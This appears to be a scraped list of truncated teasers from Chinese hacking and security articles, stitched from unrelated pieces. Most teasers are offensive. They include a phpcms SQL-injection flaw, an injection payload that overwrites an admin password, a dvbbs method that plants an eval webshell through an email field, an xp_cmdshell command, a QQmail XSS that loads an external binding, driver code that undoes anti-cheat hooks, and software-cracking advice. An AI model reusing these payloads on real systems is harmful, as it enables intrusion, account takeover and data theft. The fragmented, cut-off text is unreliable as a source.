ALTER PROCEDURE [dbo].[CurrentPageInfo]-- 获得某一页的数据--@beginNo int = 0, --起始记录号(即从哪一条开始取)@count int = 100, --取的结果集的总数@resultColumns varchar(2000) = '*', --需要得到的字段(即column1,column2,.....

在使用web用户控件时，经常遇到一种情况：控件需要与包含它的父页面进行交互。交互的种类很多，也分不同的层次。可以使用viewstate,session乃至静态变量。但有些时候，当控件本身会触发回传，那么，就必须使用事件来进行处理了。说起事件

一直想写一系列关于web控件的文章，说说自己的一些体会。但一直很忙，就将这些文章分解开来，形成一个个的知识点随笔了:)我们在使用web用户控件时，经常遇到一种情况：控件需要与包含它的页面进行交互。交互的种类很多， 也分不同的层次。

作者：幻泉[B.S.N]受影响程序： phpcms2008 gbk漏洞文件：ask/search_ajax.php漏洞等级：高漏洞说明：/ask/search_ajax.phpPHP代码if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exi

为了考验，庸庸碌碌的过了半年。现在终于出头了，现在又忙于毕业设计（软件界面美化和驱动文件加壳），没空学习内核知识 。今天特把以前的一些想法发出来，大家讨论讨论。 在网上找了一下，谈文件隐藏的不少，说如何检测隐藏文件的好像不

我等小菜自己写不来asp马，只能用大虾写的，但网上流传的都不知道是几手的了难免有些居心不良的人会在里面加后门。好不容易拿到个shell又被别人偷走了怎么甘心啊！所以在下完asp木马后要先检查有没后门，通常加了后门的为了隐秘性，都会加

0×00 为什么我们会有这个想法0×01 web应用程序中后门的基本思想0×02 实际应用中的一些例子0×00 为什么我们会有这个想法毫无疑问，web是近几年的热点，各种各样的服务都开始网络化，用户的敏感信息也开始不只是存储在自己的计算机里，而开

sqlsus是一个比较不错的mysql注射工具，感觉最好用的两点就是注射获取数据速度非常快，另外一个最大的特点就是自动搜索可写目录，上传webshell，我们找到他的功能实现代码进行分析# TODO handle src tags rather than just img srcsub up

现在大多数网络游戏都使用驱动级的反外挂保护,使其他程序无法获得其游戏窗口句柄，下面驱动代码可以恢复被TesSafe.sys Hook掉的API。#include ntddk.h#include windef.h#include ntimage.h#include "Common.h"typedef struct _KAPC_STATE

function Copyright(){var Author=”80sec”;var Email=”kEvin#80sec.com”.replace(”#”,”@”)var Site=”http://www.80sec.com”;var Date=new Date(2009,4,24).toLocaleString();var Reference=”http://www.80sec.com/Microsoft-I

破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了！我们只需要解除这些限制自然就达到了破解的目的了

不想评论ename是不是垃圾之类的,不过6台DNS服务器在几天内大范围的挂掉，自己都说自己是什么世界排名前面的服务商，还什么国内顶级服务商，就这样的反应速度，和国外根本没法比！上千万的ename域名全部挂了！这些损失谁来陪？？？还不是用

|=---------------------------------------------------------------------------=||=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=||=------------------------------------------------------------

该漏洞位于 Room目录下的Chase.aspx文件，由于LotteryID 没有进行安全检查，导致注入漏洞发生。EXP如下Room/Chase.aspx?LotteryID=28 ; update T_Users Set Password='xx' where ID=1http://hi.baidu.com/isbx/blog/item/bee2d31b7ab4bdd

在实战中我们常常面临这样的困境：我们感觉到目标网站采用的是一套开放的源码，但是由站长对页面的修改抹杀了能够直接获取这套源码名称的显性标志。这对我们的破解显然是不利的，我们可能会为了找到源码来研究而疲于到各大下载网站下载类

首先有必要先讲几个名词，有助于理解本文：名词解析[1] 探查（DETERMINE）：“猜测”（GUESSING），尽可能准确地猜测远端主机所用操作系统。[2] 错误（ERROROUS）：“不正确的”（INCORRECT）。指发送至远端主机行式打印机守护进程的请求

作者：MJ0011 2009.05.13感谢：Iceboy发现此问题并提供DUMP漏洞厂商及产品：Microsoft Windows 7 rc 7100 090421存在漏洞组件：win32k.sys Timestamp :49ee8dc8存在漏洞函数:NtUserGetDc/NtUserGetDcEx漏洞描述：Win32k.sys是WINDOWS的GD

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa" -P""' /*********** 导入Excel Select * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Sour

　　一直以来都以为只有空格，tab键和注释符/**/可以用来切割sql关键字，段时间在邪八看了风迅cms注入漏洞那篇帖子，才知道原来回车也可以用来作为分割符（以前竟然没有想到，真是失败）。回车的ascii码是chr(13)&chr(10)，至于为什么要两

dvbbs删除upload.inc后得shell得方法 - 前提是得到前后台管理权限 进入后台后 先到用户管理 随便改个人的邮件地址为 %eval request(chr(35))%@163.com 保存后 找到 邮件列表导出 然后导出邮件列表到文本 把文件名的名字改为.

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）文章作者：fhod帝国备份王(Empirebak)简介EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.可在 http

+展开-VBScriptonerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strComputer="."SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_strComputer&"\root\default:StdRegProv")strKeyPath="SOFTWARE\Ipswitch\IMail

QQmail Multiple Xss VulnerabilitiesAuthor: www.80vul.com1. firefox2 css xss vulnerabilitiesstyleBODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}/styletest.xml:?xml version="1.0"?bindings xmlns="http://www.moz

我记得有一种黑客工具，在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方服务器上面,并远程执行DOS命令。当时觉得很好奇，当然作为程序员的我觉得很不爽，赶快对SQL SERVER进行了一番研究，并整理出了这篇文章，希

今天看东西看累了，就随便下载了这样的一套代码。大家可以看下他的说明，号称完全防注入攻击，密码32位Md5加密。看了一下大部分注射是基本不可能了，除非对方漏写东西。但是有这样一个比较可说的漏洞。cf_do.php+展开-PHP//留言if($actio